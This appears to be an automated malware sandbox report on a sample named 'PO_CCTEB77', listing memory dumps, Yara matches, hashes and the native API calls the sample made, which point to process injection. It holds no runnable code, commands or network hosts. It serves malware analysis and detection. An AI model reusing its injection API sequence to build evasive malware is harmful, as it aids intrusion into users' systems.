                                                                            • Source File: 00000000.00000002.2048736020.0000000008340000.00000040.00000800.00020000.00000000.sdmp, Offset: 08340000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_8340000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: `va
                                                                            • API String ID: 0-542655976
                                                                            • Opcode ID: 0e057600591f5b6621a0961591bb52990eb8fc4f98ab11ec36f46e59df657b8f
                                                                            • Instruction ID: 83e61af2ae45ea17095c22d9a5f8fd668d891a52065ea0498340de8d88efa664
                                                                            • Opcode Fuzzy Hash: 0e057600591f5b6621a0961591bb52990eb8fc4f98ab11ec36f46e59df657b8f
                                                                            • Instruction Fuzzy Hash: 07419D70E152189FDB18CF6AC980A9EFBF7AFC9300F14D16AD508AB355DB305A468F61
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2048736020.0000000008340000.00000040.00000800.00020000.00000000.sdmp, Offset: 08340000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_8340000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: @
                                                                            • API String ID: 0-2766056989
                                                                            • Opcode ID: 843e1e544d33ca875792b26635db53a6de4bbb4d6e8efc818747300d3cb3aafe
                                                                            • Instruction ID: 6381d220e76d658bbd127878a0f4a91c0f670420d4f1323fa23621467c3cee2a
                                                                            • Opcode Fuzzy Hash: 843e1e544d33ca875792b26635db53a6de4bbb4d6e8efc818747300d3cb3aafe
                                                                            • Instruction Fuzzy Hash: B3311AB0E056149FEB58CF6BC94468EFBF3AFC9201F08D1AAD408AB215DB349945CF55
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2048736020.0000000008340000.00000040.00000800.00020000.00000000.sdmp, Offset: 08340000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_8340000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: @
                                                                            • API String ID: 0-2766056989
                                                                            • Opcode ID: 4028bfe624187194182e2a326ff40bdc47b2522a86ed72c8d735481c199ab5b8
                                                                            Execution Graph

                                                                            Execution Coverage:1.4%
                                                                            Dynamic/Decrypted Code Coverage:1.8%
                                                                            Signature Coverage:11.1%
                                                                            Total number of Nodes:397
                                                                            Total number of Limit Nodes:35

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • NtResumeThread.NTDLL(%o@,?,?,?,?), ref: 0040A46A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2154396659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_PO_CCTEB77.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ResumeThread
                                                                            • String ID: %o@$%o@
                                                                            • API String ID: 947044025-618112537
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • NtCreateSection.NTDLL(?,00000000,000F001F,?,?,An@,00000000,?,?,08000000), ref: 0040A88E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2154396659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_PO_CCTEB77.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateSection
                                                                            • String ID: An@
                                                                            • API String ID: 2449625523-62601564
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • NtCreateFile.NTDLL(?,?,?,?,?,?,00000000,?,?,?,?), ref: 0040ACDE
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2154396659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_PO_CCTEB77.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateFile
                                                                            • String ID:
                                                                            • API String ID: 823142352-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • NtMapViewOfSection.NTDLL(?,00000000,00000000,00000000,?,?,00000000,?,00406E84,?,?,?,00000000), ref: 0040AABA
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2154396659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_PO_CCTEB77.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: SectionView
                                                                            • String ID:
                                                                            • API String ID: 1323581903-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • NtReadFile.NTDLL(?,?,?,?,?,?,00000000,?,?), ref: 0040AF06
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2154396659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_PO_CCTEB77.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FileRead
                                                                            • String ID:
                                                                            • API String ID: 2738559852-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • NtAllocateVirtualMemory.NTDLL(?,?,?,?,?,?), ref: 0040B77A
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2154396659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_PO_CCTEB77.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocateMemoryVirtual
                                                                            • String ID:
                                                                            • API String ID: 2167126740-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • NtSetContextThread.NTDLL(?,?), ref: 0040A26A
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2154396659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_PO_CCTEB77.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ContextThread
                                                                            • String ID:
                                                                            • API String ID: 1591575202-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • NtDelayExecution.NTDLL(0041A6B1,?,?,?,00000000), ref: 0040B35B
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2154396659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_PO_CCTEB77.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: DelayExecution
                                                                            • String ID:
                                                                            • API String ID: 1249177460-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • NtSuspendThread.NTDLL(?,?), ref: 00409E6A
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2154396659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_PO_CCTEB77.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: SuspendThread
                                                                            • String ID:
                                                                            • API String ID: 3178671153-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • NtGetContextThread.NTDLL(?,?), ref: 0040A06A
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2154396659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_PO_CCTEB77.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ContextThread
                                                                            • String ID:
                                                                            • API String ID: 1591575202-0
                                                                            • Opcode ID: c486c64c00cd5f5b8c72e1e55815e763dc87eb2ab1f6ce2e21a35978956b8d16
                                                                            • Instruction ID: cb0abd5b403f6b9fc28d3a6aa314449394bfc664419b332a47aa0db7b876805e
                                                                            • Opcode Fuzzy Hash: c486c64c00cd5f5b8c72e1e55815e763dc87eb2ab1f6ce2e21a35978956b8d16
                                                                            • Instruction Fuzzy Hash: 52714C71E0425CDFCB04CFA9C490AEDBBF1AF49304F1880AAE459B7381D239AA52CF55
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00417465
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2154396659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_PO_CCTEB77.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Load
                                                                            • String ID:
                                                                            • API String ID: 2234796835-0
                                                                            • Opcode ID: 1fcb73fbd77ef36cb2ce4409c10369b23ff0cc34926120964a4f0ebcc4b86230
                                                                            • Instruction ID: 1361856df78bc134776308968c2a22ed589fa1034180a1cbb88d919f5dfdd5b0
                                                                            • Opcode Fuzzy Hash: 1fcb73fbd77ef36cb2ce4409c10369b23ff0cc34926120964a4f0ebcc4b86230
                                                                            • Instruction Fuzzy Hash: 85011EB5E4020DABDB10DAA5ED42FDEB7789B54308F00819AE90897241F635EB588B95
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • NtClose.NTDLL(0041A658,?,?,00000000,?,0041A658,?,?,?,?,?,?,?,?,00000000,?), ref: 0042848A
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2154396659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_PO_CCTEB77.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Close
                                                                            • String ID:
                                                                            • API String ID: 3535843008-0
                                                                            • Opcode ID: 95eb5ec58ed36a9217d741a15508274ea77d94a2defe0925d6dabe828dc0a160
                                                                            • Instruction ID: 8f31afb53f65978ff8a5df44bbc3e5722fab298bbb2beb57612707ad3f89b0d5
                                                                            • Opcode Fuzzy Hash: 95eb5ec58ed36a9217d741a15508274ea77d94a2defe0925d6dabe828dc0a160
                                                                            • Instruction Fuzzy Hash: 0EE086712106147BD120FA5ADC41F97B76CEFC6715F40801AFA08AB242C670790587F5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: eaae07484238b6883173be2a3eaa6db5cad591a31f6741c5a68857b8958e55ee
                                                                            • Instruction ID: 01b5e32267ecf2c87cfa22f83328561b82f04bdbe8204e38853a35196788a857
                                                                            • Opcode Fuzzy Hash: eaae07484238b6883173be2a3eaa6db5cad591a31f6741c5a68857b8958e55ee
                                                                            • Instruction Fuzzy Hash: 2190026324240007410571584415616500E97E2301B55C021E2018590DC6258A956226
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 9c85606f968a1ea323f6cb81995a01020675cf80c102e57d79822758e7f0e82a
                                                                            • Instruction ID: 1575940be21992e1347ccf908c99fcb9998a9e118374d73e8dde543702f1da35
                                                                            • Opcode Fuzzy Hash: 9c85606f968a1ea323f6cb81995a01020675cf80c102e57d79822758e7f0e82a
                                                                            • Instruction Fuzzy Hash: 9F90023324140417D11171584505707100D97D2341F95C412A1428558DD7568B56A222
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 3237626a83325ceddc1134234edb77cb2cf9142715f2e338373abb9aa6705451
                                                                            • Instruction ID: 7cfee75088f2314e818a42fe45221fb139b1fb55e5fe668bbc50c5b9921b7469
                                                                            • Opcode Fuzzy Hash: 3237626a83325ceddc1134234edb77cb2cf9142715f2e338373abb9aa6705451
                                                                            • Instruction Fuzzy Hash: 8190023324148807D1107158840574A100997D2301F59C411A5428658DC7958A957222
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 33df94f2eb2992f4a0880b0303108024c3fa7464ace7bd520e0a1cc3572307a1
                                                                            • Instruction ID: ed6901184416b9e963f5133572b8691055b0cbf8a80e85abd67577509dbe4070
                                                                            • Opcode Fuzzy Hash: 33df94f2eb2992f4a0880b0303108024c3fa7464ace7bd520e0a1cc3572307a1
                                                                            • Instruction Fuzzy Hash: BF90023364550407D10071584515706200997D2301F65C411A1428568DC7958B5566A3
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2154396659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_PO_CCTEB77.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 7e327r58$7e327r58
                                                                            • API String ID: 0-4105805501
                                                                            • Opcode ID: d45de8c7b50298374bac702908ff5e65982283c5d550219a6107e280cf31b49d
                                                                            • Instruction ID: cd7b0ebc4f312fe051f5a44f46a53db313936eba4b75457889bdb1bd7ecce334
                                                                            • Opcode Fuzzy Hash: d45de8c7b50298374bac702908ff5e65982283c5d550219a6107e280cf31b49d
                                                                            • Instruction Fuzzy Hash: BC41C333549289AEC7029F745C415DEBF78EE81365B5841DFE4809B503D22A5B87C7C6
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • PostThreadMessageW.USER32(7e327r58,00000111,00000000,00000000), ref: 00413C6A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2154396659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_PO_CCTEB77.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: MessagePostThread
                                                                            • String ID: 7e327r58$7e327r58
                                                                            • API String ID: 1836367815-4105805501
                                                                            • Opcode ID: adcceddb6a4681dd82a74107d39f3fbb2828151b626a08a6d540b20f6b9e8212
                                                                            • Instruction ID: 5cd8f1ba56ca66e7765762b9b338afedcaf28b67fd49832bfc28183128bb71e6
                                                                            • Opcode Fuzzy Hash: adcceddb6a4681dd82a74107d39f3fbb2828151b626a08a6d540b20f6b9e8212
                                                                            • Instruction Fuzzy Hash: AE01A572D0015C7ADB10AAE19C81DEFBB7CDF41798F408169FE1467240E57C4F468BA5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • PostThreadMessageW.USER32(7e327r58,00000111,00000000,00000000), ref: 00413C6A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2154396659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_PO_CCTEB77.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: MessagePostThread
                                                                            • String ID: 7e327r58$7e327r58
                                                                            • API String ID: 1836367815-4105805501
                                                                            • Opcode ID: 68306d0fe5426d68deaf2a8dbc272079cdc72e99b8a943e4d65e1200b1802fd1
                                                                            • Instruction ID: 2b11c294a3421bd6dee33fc7c99cb899cc9a872ef9e39964c471318ebb4cf5bc
                                                                            • Opcode Fuzzy Hash: 68306d0fe5426d68deaf2a8dbc272079cdc72e99b8a943e4d65e1200b1802fd1
                                                                            • Instruction Fuzzy Hash: E101C4B2D0015C7ADB00AAE19C81DEF7B7CDF41698F408069FE14B7240E57C4F068BA5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • RtlFreeHeap.NTDLL(004122B5,?,004122B5,?,00000000,004122B5,?,004122B5,?,?), ref: 004287A2
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2154396659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_PO_CCTEB77.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FreeHeap
                                                                            • String ID:
                                                                            • API String ID: 3298025750-0
                                                                            • Opcode ID: 084c3a0141a29753b9564923c41a14955e4b30b2448ffbc91be334a51728e4f3
                                                                            • Instruction ID: 2c1a71614233d00c30b3bb4d428e9b765d3603c09bbdcb5fe6948e3b9beed476
                                                                            • Opcode Fuzzy Hash: 084c3a0141a29753b9564923c41a14955e4b30b2448ffbc91be334a51728e4f3
                                                                            • Instruction Fuzzy Hash: B4E092B22043487BD610EE99EC81FDB37ACEFC5710F404419F908A7241C670BD108BB8
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • RtlAllocateHeap.NTDLL(00419A10,?,?,00419A10,?,?,?,00419A10,?,00002000), ref: 0042874F
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2154396659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_PO_CCTEB77.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocateHeap
                                                                            • String ID:
                                                                            • API String ID: 1279760036-0
                                                                            • Opcode ID: 724edec358f2f41a1d8b2e1c973ed9c8748d8b2567d1867b73260787005ea862
                                                                            • Instruction ID: 6bdbf4cad4e37bd7c73d14c5b69e3c11c0b4df46002673f412cfc2a151788784
                                                                            • Opcode Fuzzy Hash: 724edec358f2f41a1d8b2e1c973ed9c8748d8b2567d1867b73260787005ea862
                                                                            • Instruction Fuzzy Hash: 88E06DB1204204BBD610EE59EC42EAB77ACEFC5710F40401AF908A7241C670BD108BB8
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • ExitProcess.KERNEL32(?,00000000,?,?,4CF2BAE6,?,?,4CF2BAE6), ref: 004287E7
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2154396659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_PO_CCTEB77.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ExitProcess
                                                                            • String ID:
                                                                            • API String ID: 621844428-0
                                                                            • Opcode ID: 5f2d11c3415c3880341c2dde1694300776f6da084e27cb50d6fd970313eaf6a5
                                                                            • Instruction ID: a70d2caf07bf9b91732c47b13bc5c2eba1b16618381eb4ebddd6603121694906
                                                                            • Opcode Fuzzy Hash: 5f2d11c3415c3880341c2dde1694300776f6da084e27cb50d6fd970313eaf6a5
                                                                            • Instruction Fuzzy Hash: 0AE04F712442547BD220AA6AEC41FD7776CDBC5754F40411AFA18A7282C6707A058BE4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: b9ccb88c88a8c8ea967ac36607a383b5e00c26888a5f25347c7e9ce454bae86e
                                                                            • Instruction ID: 450d17dcebef1bfb723e773a3134e069cc8c8590a95641f685744330311b5f63
                                                                            • Opcode Fuzzy Hash: b9ccb88c88a8c8ea967ac36607a383b5e00c26888a5f25347c7e9ce454bae86e
                                                                            • Instruction Fuzzy Hash: 12B09B739415C5CEDA52E7644A0D717790577D2701F15C065D3034685F8778C2D5E276
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            • <unknown>, xrefs: 01878D2E, 01878D81, 01878E00, 01878E49, 01878EC7, 01878F3E
                                                                            • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01878E86
                                                                            • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 01878F2D
                                                                            • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 01878DC4
                                                                            • The resource is owned shared by %d threads, xrefs: 01878E2E
                                                                            • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 01878D8C
                                                                            • *** enter .exr %p for the exception record, xrefs: 01878FA1
                                                                            • *** then kb to get the faulting stack, xrefs: 01878FCC
                                                                            • Go determine why that thread has not released the critical section., xrefs: 01878E75
                                                                            • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 01878E4B
                                                                            • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 01878F34
                                                                            • This failed because of error %Ix., xrefs: 01878EF6
                                                                            • *** A stack buffer overrun occurred in %ws:%s, xrefs: 01878DA3
                                                                            • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 01878DD3
                                                                            • *** Inpage error in %ws:%s, xrefs: 01878EC8
                                                                            • *** An Access Violation occurred in %ws:%s, xrefs: 01878F3F
                                                                            • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01878E3F
                                                                            • The instruction at %p referenced memory at %p., xrefs: 01878EE2
                                                                            • The critical section is owned by thread %p., xrefs: 01878E69
                                                                            • The resource is owned exclusively by thread %p, xrefs: 01878E24
                                                                            • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 01878FEF
                                                                            • read from, xrefs: 01878F5D, 01878F62
                                                                            • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 01878F26
                                                                            • *** Resource timeout (%p) in %ws:%s, xrefs: 01878E02
                                                                            • write to, xrefs: 01878F56
                                                                            • an invalid address, %p, xrefs: 01878F7F
                                                                            • *** enter .cxr %p for the context, xrefs: 01878FBD
                                                                            • a NULL pointer, xrefs: 01878F90
                                                                            • The instruction at %p tried to %s , xrefs: 01878F66
                                                                            • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 01878DB5
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                            • API String ID: 0-108210295
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                            • API String ID: 0-2160512332
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            • Thread identifier, xrefs: 0183553A
                                                                            • Critical section address, xrefs: 01835425, 018354BC, 01835534
                                                                            • Invalid debug info address of this critical section, xrefs: 018354B6
                                                                            • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0183540A, 01835496, 01835519
                                                                            • Critical section address., xrefs: 01835502
                                                                            • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 018354E2
                                                                            • undeleted critical section in freed memory, xrefs: 0183542B
                                                                            • corrupted critical section, xrefs: 018354C2
                                                                            • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 018354CE
                                                                            • double initialized or corrupted critical section, xrefs: 01835508
                                                                            • Critical section debug info address, xrefs: 0183541F, 0183552E
                                                                            • Thread is in a state in which it cannot own a critical section, xrefs: 01835543
                                                                            • Address of the debug info found in the active list., xrefs: 018354AE, 018354FA
                                                                            • 8, xrefs: 018352E3
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                            • API String ID: 0-2368682639
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01832624
                                                                            • RtlpResolveAssemblyStorageMapEntry, xrefs: 0183261F
                                                                            • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01832409
                                                                            • @, xrefs: 0183259B
                                                                            • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01832412
                                                                            • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01832498
                                                                            • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 018324C0
                                                                            • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 018322E4
                                                                            • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 018325EB
